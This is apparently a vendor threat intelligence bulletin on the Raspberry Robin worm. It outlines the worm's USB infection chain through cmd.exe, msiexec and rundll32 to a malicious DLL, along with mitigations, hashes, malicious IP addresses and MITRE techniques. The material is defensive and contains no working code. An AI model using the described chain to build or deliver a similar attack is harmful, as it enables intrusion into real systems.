Get in Touch

Get in Touch

Get in Touch

Please get in touch using the form below.

Close form

Home / Threat Intelligence bulletins / Raspberry Robin Worm infects Telecoms, Governments

Target Industry

Initially seen in technology and manufacturing organisations, the worm has now spread through government agencies and telecommunication entities in Latin America, Australia and Europe.

Overview

Severity level: High – Exploitation is likely to lead to further malicious activity, with human operated ransomware and other types of malware being observed.
Raspberry Robin was initially seen spreading via infected external drives but Microsoft is now aware of at least four confirmed Raspberry Robin entry vectors.

The malware uses Windows Installer to communicate with compromised QNAP-associated domains to download and install malicious DLL files to the infected device.

The USB payload behaviour follows five distinct steps:

1. Infected external device attached to victim’s computer
2. Cmd.exe reads and executes malicious file then launches msiexec.exe that reaches out to malicious URL
3. Malicious DLL installed from the previously connected URL
4. Rundll32.exe launches legitimate Windows utility to execute malicious DLL
5. Outbound connections attempted, usually to TOR networks.

Researchers at Avast have documented a heavily obfuscated DLL backdoor used by Raspberry Robin, which they’ve named Roshtyak.

Impact

Depending on the network’s settings, an infected USB drive may autorun the malware or trick a user into manual execution.
Successful execution can result in the compromise of the system. This may lead to further attacks and the loss of sensitive data.

Vulnerability Detection

Microsoft has been closely tracking Raspberry Robin activity and current builds of Microsoft Defender can alert users to exploitation by flagging at stage 3 of the attack chain.
Logs may also be searched for unexpected msiexec.exe activity and DLL downloads/connections.

Affected Products

WindowsOS.

Containment, Mitigations & Remediations

It is strongly recommended that customers have an effective endpoint detection & response (EDR) solution in place to help protect against this type of attack.

Untrained users should not investigate unknown external media devices. Aside from the possibility of malicious files or exploit code, one well-known attack is for the USB device to present to the host operating system as a keyboard and start typing malicious commands. This can present issues for investigators.

Autorun is disabled by default in recent Windows versions but may be enabled via registry changes or group policy on legacy networks.

Microsoft reports that their attack surface reduction rules have been successful in mitigating the attack in the early stages

Microsoft advises customers to ensure Defender anti-virus scans include removable disks. They’ve also published advice on defending against ransomware.

Indicators of Compromise

Raspberry Robin reported hash values:

6fb0ad3f756b5d1f871cf34c3e4ea47cb34643cd17709a09c25076c400313adf
1a5fcb209b5af4c620453a70653263109716f277150f0d389810df85ec0beac1
1d2c8db9ac6082f32e9178469c2c416e5e170095d7f84a771dbb91192c681598
cea528052dc6137b9ec1f2b03342921894fd0bb3b21209320bfdcb4ff7d27fb8
6f5ea8383bc3bd07668a7d24fe9b0828
e8f0d33109448f877a0e532b1a27131a

Raspberry Robin associated IPs:

46.11.88.251
77.28.21.107
77.99.129.181
84.221.210.56
85.171.54.231

Roshtyak indicators:

https://github.com/avast/ioc/tree/master/RaspberryRobin

Threat Landscape

Raspberry Robin has been spreading since its initial discovery at the tail end of 2021. Initially spreading relatively slowly, it is now one of the largest malware distribution platforms currently active. Microsoft reports that nearly 3,000 devices in almost 1,000 organisations have seen at least one Raspberry Robin payload-related alert in October 2022.

Threat Group

Infection by Raspberry Robin has at different times led to deployment of IcedID, Bumblebee and TrueBot payloads indicating they may be providing initial access to a number of other threat actors.

In July 2022 Microsoft reported FakeUpdates (SocGholish) malware being delivered via existing Raspberry Robin infections leading to DEV-0243 activity (EvilCorp).

In October 2022, Microsoft researchers observed Raspberry Robin infections followed by Cobalt Strike activity from DEV-0950 (FIN11/TA505) leading to deployment of Clop ransomware.

Mitre Methodologies

T1036 – Masquerading
T1091– Replication Through Removable Media
T1059.003 – Command and Scripting Interpreter: Windows Command Shell
T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control
T1218.011 – System Binary Proxy Execution: Rundll32
T1218.008 – System Binary Proxy Execution: Odbcconf
T1218.007 – System Binary Proxy Execution: Msiexec
T1218.010– System Binary Proxy Execution: Regsver32
T1574.002 – Hijack Execution Flow: DLL Side-Loading
T1071.001 – Application Layer Protocol: Web Protocols
T1105 – Ingress Tool Transfer

Further Information

Raspberry Robin gets the worm early

Raspberry Robin: Highly Evasive Worm Spreads over External Disks

Raspberry Robin’s Roshtyak: A Little Lesson in Trickery

Raspberry Robin worm part of larger ecosystem facilitating pre-ransomware activity